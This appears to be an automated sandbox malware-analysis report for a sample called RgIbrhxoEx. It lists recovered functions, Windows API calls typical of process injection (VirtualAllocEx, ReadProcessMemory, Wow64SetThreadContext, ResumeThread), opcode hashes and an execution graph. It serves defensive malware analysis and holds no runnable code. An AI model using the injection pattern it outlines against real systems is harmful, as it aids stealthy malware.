                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1320000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: MemoryProcessRead
                      • String ID:
                      • API String ID: 1726664587-0
                      • Opcode ID: 1ab316ed40b8ce5b5bf7d1d5486284f7fd0be33c5623955f60cfe25f8edeeb4d
                      • Instruction ID: 1f4629b9a23d16b758ad73f6f71e25a040ed30c5591c0448badaf6e2df5507f1
                      • Opcode Fuzzy Hash: 1ab316ed40b8ce5b5bf7d1d5486284f7fd0be33c5623955f60cfe25f8edeeb4d
                      • Instruction Fuzzy Hash: E52139B19002198FCB10DFAAC8806EEFBF5FF48310F10842AE519A7240C7789545CBA0
                      Function 013235B9 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                      Download Yara Rule
                      APIs
                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0132363E
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131400882.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1320000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: ContextThreadWow64
                      • String ID:
                      • API String ID: 983334009-0
                      • Opcode ID: a47f008defe95b43d3da476b18fcd8d80dfce21d24e36f9fd899a798bf1cd5b1
                      • Instruction ID: bb81a534c914e7cf6c87df6b575db706a4474eb4ed861b421a0d52a255f5cde7
                      • Opcode Fuzzy Hash: a47f008defe95b43d3da476b18fcd8d80dfce21d24e36f9fd899a798bf1cd5b1
                      • Instruction Fuzzy Hash: 082139719003198FDB20DFAAC4857EEBBF4FF49324F10842AD559A7340D7789945CBA1
                      Function 01323848 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                      Download Yara Rule
                      APIs
                      • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 013238C8
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131400882.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1320000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: MemoryProcessRead
                      • String ID:
                      • API String ID: 1726664587-0
                      • Opcode ID: 6e865f2ac3d71f6b3f2d7d7c0acb2d5a9c10fede56aa238937663a51c01dcb3d
                      • Instruction ID: 6a5fc024125cb248fa43ba163022fddcd8ec62a596fded0800ac1643d338a935
                      • Opcode Fuzzy Hash: 6e865f2ac3d71f6b3f2d7d7c0acb2d5a9c10fede56aa238937663a51c01dcb3d
                      • Instruction Fuzzy Hash: 972139B1C003599FCB10DFAAC880AEEFBF5FF48310F10882AE519A7240C778A544CBA0
                      Function 013235C0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                      Download Yara Rule
                      APIs
                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0132363E
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131400882.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1320000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: ContextThreadWow64
                      • String ID:
                      • API String ID: 983334009-0
                      • Opcode ID: ac788b96bd789a6daa16ed0c86ca01696c6abb8fc9e3d45f1daa38f03965b528
                      • Instruction ID: 4f3cf31ed04ab099dae03c592c42476cae4cb4961c155c690bf5ff48cf55439d
                      • Opcode Fuzzy Hash: ac788b96bd789a6daa16ed0c86ca01696c6abb8fc9e3d45f1daa38f03965b528
                      • Instruction Fuzzy Hash: D42134B19002198FDB20DFAAC4857AEBBF4FF48324F10842AD559A7240CB78A945CBA0
                      Function 0137D548 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                      Download Yara Rule
                      APIs
                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0137D5CF
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131460876.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1370000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: DuplicateHandle
                      • String ID:
                      • API String ID: 3793708945-0
                      • Opcode ID: a38755fe40d5d0cdbfcfed4d1807ffbd959b771fa4eaf499facd7fa16b0bc5f4
                      • Instruction ID: c5d7792b3c6110d863a1f751d71ee23b125fae0f4af752f8699193e311d4d105
                      • Opcode Fuzzy Hash: a38755fe40d5d0cdbfcfed4d1807ffbd959b771fa4eaf499facd7fa16b0bc5f4
                      • Instruction Fuzzy Hash: D421E6B59002089FDB10CF9AD584ADEBFF4FF48314F14841AE914A3310D378A944CFA4
                      Function 0137AA88 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                      Download Yara Rule
                      APIs
                      • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0137B341,00000800,00000000,00000000), ref: 0137B552
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131460876.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1370000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: LibraryLoad
                      • String ID:
                      • API String ID: 1029625771-0
                      • Opcode ID: 1d483f1af290723e627f7136630a469a878e60e7589e9a3cf29df91416a7ddc8
                      • Instruction ID: da21a758c8f31e4b64cca6c6c03a6bff4cfbef00821f3f58a930886c8fc6ae08
                      • Opcode Fuzzy Hash: 1d483f1af290723e627f7136630a469a878e60e7589e9a3cf29df91416a7ddc8
                      • Instruction Fuzzy Hash: 481112B6800349CFDB20DF9AC448B9EFBF8EB48324F10842AE519A7210C379A545CFA4
                      Function 0137B4E1 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                      Download Yara Rule
                      APIs
                      • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0137B341,00000800,00000000,00000000), ref: 0137B552
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131460876.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1370000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: LibraryLoad
                      • String ID:
                      • API String ID: 1029625771-0
                      • Opcode ID: 8197f048688c9baedae75c50a85c3966ac645d54b244d16c5ff4a1da1829b944
                      • Instruction ID: 62a7bb41892cbed96925a37a737a3764e54688ef84247489358309b607ed7f0f
                      • Opcode Fuzzy Hash: 8197f048688c9baedae75c50a85c3966ac645d54b244d16c5ff4a1da1829b944
                      • Instruction Fuzzy Hash: C31114B6800349DFDB20CF9AD444ADEFBF5EB48324F14841AD519A7200C379A545CFA0
                      Function 01323698 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                      Download Yara Rule
                      APIs
                      • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 01323706
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131400882.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1320000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: 839bcc028d764b08d2a12b1bc8c2111b030c512a40473e2b59bf1d29d1366957
                      • Instruction ID: 7f4432b873096a69d5238bc389a3ade495ac8651236cde2f71bd067c521d129e
                      • Opcode Fuzzy Hash: 839bcc028d764b08d2a12b1bc8c2111b030c512a40473e2b59bf1d29d1366957
                      • Instruction Fuzzy Hash: CF1137B58002499FCB10DFAAC844AEEBFF5FF48314F108819E519A7250C779A544CFA0
                      Function 01323510 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131400882.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1320000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: ResumeThread
                      • String ID:
                      • API String ID: 947044025-0
                      • Opcode ID: 42285c50787c67f72fdd5edf63fd6c1d8f1f6acc11b7b116464ea75833178876
                      • Instruction ID: 73c67dc83d296bdd7f4489c955e7e29939d2b27ddb89a78e8eb01b5d083dfb0b
                      • Opcode Fuzzy Hash: 42285c50787c67f72fdd5edf63fd6c1d8f1f6acc11b7b116464ea75833178876
                      • Instruction Fuzzy Hash: 0B1128B1D002498FDB24DFAAC4457AEFBF5EF89314F208419D519A7240CB79A544CBA0
                      Function 01323508 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131400882.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1320000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: ResumeThread
                      • String ID:
                      • API String ID: 947044025-0
                      • Opcode ID: 3ea3d2e1c895531fe618b07d7da5bc18a73bb2f9ea866d4edf7a8599d956b5d1
                      • Instruction ID: ddd02831750f3db9a8f1195c6c7d072cc6dfed3b048f8f45672da391cbe2bc53
                      • Opcode Fuzzy Hash: 3ea3d2e1c895531fe618b07d7da5bc18a73bb2f9ea866d4edf7a8599d956b5d1
                      • Instruction Fuzzy Hash: 1C1158B5D002088FDB20EFAAC5457EEFBF5EF88314F20881AC519A7250C738A544CBA0
                      Function 0137B259 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                      Download Yara Rule
                      APIs
                      • GetModuleHandleW.KERNEL32(00000000), ref: 0137B2C6
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131460876.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1370000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: HandleModule
                      • String ID:
                      • API String ID: 4139908857-0
                      • Opcode ID: 57f48de335a9a6a3954b8c2450941122efd0fb12979fe93c5d7ddbbd0d86e64b
                      • Instruction ID: e31ba794e30feadff621654a480be23493cd15ad80be7bc69156aa4ca4380936
                      • Opcode Fuzzy Hash: 57f48de335a9a6a3954b8c2450941122efd0fb12979fe93c5d7ddbbd0d86e64b
                      • Instruction Fuzzy Hash: 9011FDB58002498FDB20DF9AD448A9EFBF8AF89214F10851AD929A7210D379A545CFA1
                      Function 013252AC Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                      Download Yara Rule
                      APIs
                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 013283C5
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131400882.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1320000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: MessagePost
                      • String ID:
                      • API String ID: 410705778-0
                      • Opcode ID: 57c73dd9244e09930a7ecfba5c14b32e50aa69d506445e4342804fb8e71d007b
                      • Instruction ID: 42c9f3a90f67d4dcfa7aaefdb6c1e2c94a3695550f4b34013991167af1994c1e
                      • Opcode Fuzzy Hash: 57c73dd9244e09930a7ecfba5c14b32e50aa69d506445e4342804fb8e71d007b
                      • Instruction Fuzzy Hash: A811F5B58003599FDB10DF9AC484BDEBBF8FB48314F10845AE518A7610C379A944CFA5
                      Function 0137B260 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                      Download Yara Rule
                      APIs
                      • GetModuleHandleW.KERNEL32(00000000), ref: 0137B2C6
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131460876.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1370000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: HandleModule
                      • String ID:
                      • API String ID: 4139908857-0
                      • Opcode ID: 018825f28e73508f9b99c4f588474910088a677de85734f7ce01a618909518a1
                      • Instruction ID: 27f7fe86100bfaf2e1cb2e0c2c05ac15adae49d188246efb100f4ad7e4e3e5eb
                      • Opcode Fuzzy Hash: 018825f28e73508f9b99c4f588474910088a677de85734f7ce01a618909518a1
                      • Instruction Fuzzy Hash: 9B110FB5C002498FDB20DF9AC444A9EFBF4AF89214F10851AD918B7210C379A545CFA1
                      Function 01328361 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                      Download Yara Rule
                      APIs
                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 013283C5
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131400882.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1320000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: MessagePost
                      • String ID:
                      • API String ID: 410705778-0
                      • Opcode ID: a004b7576d2c43810775031601a95ff373893ad412d9ef1a63c071a0fb7cefb7
                      • Instruction ID: a600ba137f74a9810e74a040f6cb6015165ac69b3683b0f0ac406cf92f4a5089
                      • Opcode Fuzzy Hash: a004b7576d2c43810775031601a95ff373893ad412d9ef1a63c071a0fb7cefb7
                      • Instruction Fuzzy Hash: 8B1103B58003599FDB10DF9AC885BDEFFF8EB48314F10885AE518A3610D379A544CFA1
                      Function 00EFD01C Relevance: .1, Instructions: 72COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2130763748.0000000000EFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EFD000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_efd000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 53686e3666bc6df5141655b9431431d976ede3e0e1bc8d2f51bf6159700647c0
                      • Instruction ID: e4c522533b8aa4dc029f9434cae2759722e10c9f7d08e3994b711934ddc9c7b1
                      • Opcode Fuzzy Hash: 53686e3666bc6df5141655b9431431d976ede3e0e1bc8d2f51bf6159700647c0
                      • Instruction Fuzzy Hash: AA21F571608208DFDB15DF24D984B26BF67FB84314F20C569DA095B396CB3AD807CA61
                      Function 00EFD1D4 Relevance: .1, Instructions: 72COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2130763748.0000000000EFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EFD000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_efd000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: db1148b2e5d03eb051578a9f255975f9bdfaf0d1def7615059560ecb1bfa884f
                      • Instruction ID: f027339d5d21c8120233954de45860bbb09524d92292a3ebed4e108dc63936ea
                      • Opcode Fuzzy Hash: db1148b2e5d03eb051578a9f255975f9bdfaf0d1def7615059560ecb1bfa884f
                      • Instruction Fuzzy Hash: F8210771508208DFEB05DF54D9C0F36BF66FB84318F20C56DDA095B266C33AD806DAA1
                      Function 00EFD005 Relevance: .1, Instructions: 62COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2130763748.0000000000EFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EFD000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_efd000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0668e97824a727b0e98735c9239391c3fcbe895caa0b5ad21ac4fa32691989f1
                      • Instruction ID: 8082948c39663f69ed7e8121b5fcc40c8f6d25c6953e1e3d3b55bf3eb33923c5
                      • Opcode Fuzzy Hash: 0668e97824a727b0e98735c9239391c3fcbe895caa0b5ad21ac4fa32691989f1
                      • Instruction Fuzzy Hash: 2221807550D3848FDB03CF24D994715BF72EB46314F28C5EAD9498B2A7C33A980ACB62
                      Function 00EFD1CF Relevance: .1, Instructions: 53COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2130763748.0000000000EFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EFD000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_efd000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                      • Instruction ID: fb398a3468b40f480295dbac1322cf77eecd9568567d7aa1b37f024e00fd0f74
                      • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                      • Instruction Fuzzy Hash: 2E11BE75508244DFDB02CF50C9C4B25BF62FB84318F24C6AAD9494B266C33AD81ACBA1

                      Non-executed Functions

                      Function 01329C30 Relevance: .4, Instructions: 384COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131400882.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1320000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 341057c4115c2fdff9a089710ba29935aece8ad7060adcf3841a0128bbdb1474
                      • Instruction ID: ddbb2e608451464f078f4f41eeff0b74d00be80d6b7b3203928d03b6a1d51e56
                      • Opcode Fuzzy Hash: 341057c4115c2fdff9a089710ba29935aece8ad7060adcf3841a0128bbdb1474
                      • Instruction Fuzzy Hash: A5E1EF30B013258FEB25EB79C450BAEBBF6AF89708F14846ED146DB291DB39D901CB51
                      Function 02D80040 Relevance: .3, Instructions: 315COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2132977723.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2d80000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b1e2b1f119de147e132916a575d7970f0cfae55acba5aae9e344995b15a1b68f
                      • Instruction ID: acafb62df33f797aae733b454445ed2f5dfd6d6f45221b9eacd9cd15efea3261
                      • Opcode Fuzzy Hash: b1e2b1f119de147e132916a575d7970f0cfae55acba5aae9e344995b15a1b68f
                      • Instruction Fuzzy Hash: E71293F16017458EE730CF65E94C1897BB9BB91329F908309D2616B2E9DBB8358BCF44
                      Function 01320840 Relevance: .3, Instructions: 312COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131400882.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1320000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 00ec743752c3cf73ce4f5389f3c09bfa4cabb53fd6c3e75da3d6a63af403d2b7
                      • Instruction ID: 8afda78eb0e5021a9bdf9c32a72f8af49d4b0fe2bd238981787419ffdbebc6f8
                      • Opcode Fuzzy Hash: 00ec743752c3cf73ce4f5389f3c09bfa4cabb53fd6c3e75da3d6a63af403d2b7
                      • Instruction Fuzzy Hash: 38E11A74E006298FDB14DFA9C580AAEFBB2FF89305F248169E415AB356D730AD45CF60
                      Function 013228B0 Relevance: .3, Instructions: 312COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131400882.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1320000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 46a9e33a1cbd5a3648ec9e1b268713676b88f3ec9418ad99d1b3d4bf5022bbac
                      • Instruction ID: 9a976aa21706a857d5212d79491e35277b008d9933121e83363657bf78c46e08
                      • Opcode Fuzzy Hash: 46a9e33a1cbd5a3648ec9e1b268713676b88f3ec9418ad99d1b3d4bf5022bbac
                      • Instruction Fuzzy Hash: 3FE10B74E005298FDB14DFA9C980AAEFBB2FF89305F248169E415AB356D730AD41CF61
                      Function 013210B0 Relevance: .3, Instructions: 312COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131400882.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1320000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: be93f9d6a75e001d086f91dec3c93932d22697234cde2c5b4dcf3b9f51a4a9c5
                      • Instruction ID: 40c62dab6bac1f1f4c44f5029821f6ff3e39af5e91fd5e5610a045c00a0bebd8
                      • Opcode Fuzzy Hash: be93f9d6a75e001d086f91dec3c93932d22697234cde2c5b4dcf3b9f51a4a9c5
                      • Instruction Fuzzy Hash: 97E10C74E002198FCB14EFA9C6809AEFBF2FF89305F248169E515AB356D730A941CF61
                      Function 01320C78 Relevance: .3, Instructions: 312COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131400882.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1320000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2c73dd8a50d8667b27d12f494eeff9473bdd30cf3096949b0147470a66419760
                      • Instruction ID: 375af04877c17ec233800e5dc4137a1b9e271f2d58f60dffa677730db4534ccd
                      • Opcode Fuzzy Hash: 2c73dd8a50d8667b27d12f494eeff9473bdd30cf3096949b0147470a66419760
                      • Instruction Fuzzy Hash: 58E11974E001298FCB14EFA8C580AAEFBB2FF89305F248169E415AB356D731A945CF61
                      Function 01322CE8 Relevance: .3, Instructions: 312COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131400882.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1320000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6fb37be699a697e9cf331d560b618e67c18584e8fb2b40516eb394096f66e7b8
                      • Instruction ID: d5b652f9b82582d3d76d0840db751e958a618b25e286f767a8ef342c64fd5f5b
                      • Opcode Fuzzy Hash: 6fb37be699a697e9cf331d560b618e67c18584e8fb2b40516eb394096f66e7b8
                      • Instruction Fuzzy Hash: C7E10B74E001198FCB14DFA9C980AAEFBB2FF89305F248169D415AB356D735A941CF61
                      Function 0137DEA4 Relevance: .3, Instructions: 264COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131460876.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1370000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 77687c478829deff627ac87cc46a97ad3f0f4b1d94d2c91652d62c20e0dd280a
                      • Instruction ID: ea851e8ff573c0292d5b18ca561ecf7bedd7ce5a902df55e16bc016942374e28
                      • Opcode Fuzzy Hash: 77687c478829deff627ac87cc46a97ad3f0f4b1d94d2c91652d62c20e0dd280a
                      • Instruction Fuzzy Hash: 12A18E32E0020ACFCF25DFB8D84459EBBB6FF84304B15456AE915AB265DB35E915CB80
                      Function 02D80007 Relevance: .2, Instructions: 242COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2132977723.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2d80000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c9083d7939f313decb209c1262d5129d13875b4b0bb712ad49a9ca251a9645ec
                      • Instruction ID: 5a5ceda437d426781698e988f42a5fdebca12c12dfe0b02fa13d9e59ae601a6c
                      • Opcode Fuzzy Hash: c9083d7939f313decb209c1262d5129d13875b4b0bb712ad49a9ca251a9645ec
                      • Instruction Fuzzy Hash: D9D139B1A017468FDB21CF25E84C1897BB9BB95328F518319D1616F2E9DBB8348BCF44
                      Function 013210A0 Relevance: .2, Instructions: 162COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131400882.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1320000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 951201c42a63e6d1278ea2dbf268027a828f2efa65e279efc02d70a91df6a0ec
                      • Instruction ID: dde45d638071c2418865fd3ea786283507773c4e4fa326dd9bd891694bd113a5
                      • Opcode Fuzzy Hash: 951201c42a63e6d1278ea2dbf268027a828f2efa65e279efc02d70a91df6a0ec
                      • Instruction Fuzzy Hash: 33612B74E002198FDB14DFA9D9809AEFBB2FF89314F24C169E518A7355D731A941CFA0
                      Function 01320828 Relevance: .1, Instructions: 136COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131400882.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1320000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: cdb808c8c8f7760751eb9c3331aa9d8b434e7f0d4bb5c69502162f508032842c
                      • Instruction ID: 1fcc15925b431f03f9a0ebabd72ff972091c64170f298e5f2e742f1777c6b39d
                      • Opcode Fuzzy Hash: cdb808c8c8f7760751eb9c3331aa9d8b434e7f0d4bb5c69502162f508032842c
                      • Instruction Fuzzy Hash: 77514D74E002198FDB15DFA9C9805AEFBF2BF89304F24C1AAD449AB366D7309941CF61

                      Execution Graph

                      Execution Coverage:14.2%
                      Dynamic/Decrypted Code Coverage:100%
                      Signature Coverage:0%
                      Total number of Nodes:30
                      Total number of Limit Nodes:1
                      execution_graph 28881 6976361 28882 69762fc 28881->28882 28883 697636a 28881->28883 28884 697631d 28882->28884 28887 69773f1 28882->28887 28891 6977400 28882->28891 28888 697730f 28887->28888 28888->28887 28889 6977451 28888->28889 28895 6977148 28888->28895 28889->28884 28892 6977448 28891->28892 28893 6977451 28892->28893 28894 6977148 LoadLibraryW 28892->28894 28893->28884 28894->28893 28896 69775f0 LoadLibraryW 28895->28896 28898 6977665 28896->28898 28898->28889 28859 13c0871 28860 13c0889 28859->28860 28863 13c08d8 28859->28863 28868 13c08c8 28859->28868 28864 13c08fa 28863->28864 28873 13c0ce8 28864->28873 28877 13c0ce0 28864->28877 28865 13c093e 28865->28860 28869 13c08d8 28868->28869 28870 13c0ce8 GetConsoleWindow 28869->28870 28871 13c0ce0 GetConsoleWindow 28869->28871 28872 13c093e 28870->28872 28871->28872 28872->28860 28874 13c0d26 GetConsoleWindow 28873->28874 28876 13c0d56 28874->28876 28876->28865 28878 13c0ce8 GetConsoleWindow 28877->28878 28880 13c0d56 28878->28880 28880->28865

                      Executed Functions

                      Function 069775E8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54libraryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1335 69775e8-6977630 1337 6977632-6977635 1335->1337 1338 6977638-6977663 LoadLibraryW 1335->1338 1337->1338 1339 6977665-697766b 1338->1339 1340 697766c-6977689 1338->1340 1339->1340
                      APIs
                      • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,00000000,00000E20,?,?,069774A6), ref: 06977656
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.2258425881.0000000006970000.00000040.00000800.00020000.00000000.sdmp, Offset: 06970000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6970000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: LibraryLoad
                      • String ID: ]{3
                      • API String ID: 1029625771-1008762302
                      • Opcode ID: 74b81cd44a01b17e705d486c6aef8a30d6f7108cbe880635e0b59adea884c614
                      • Instruction ID: a6b67fabd909ffd3f77a2c3e99239eeeca56cf5864f66fe3131d01e6c5c70f8d
                      • Opcode Fuzzy Hash: 74b81cd44a01b17e705d486c6aef8a30d6f7108cbe880635e0b59adea884c614
                      • Instruction Fuzzy Hash: EC1114B5C006498FDB10DF9AD444ADEFBF5AB48310F10842AD419A7710D379A546CFA1
                      Function 06977148 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53libraryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
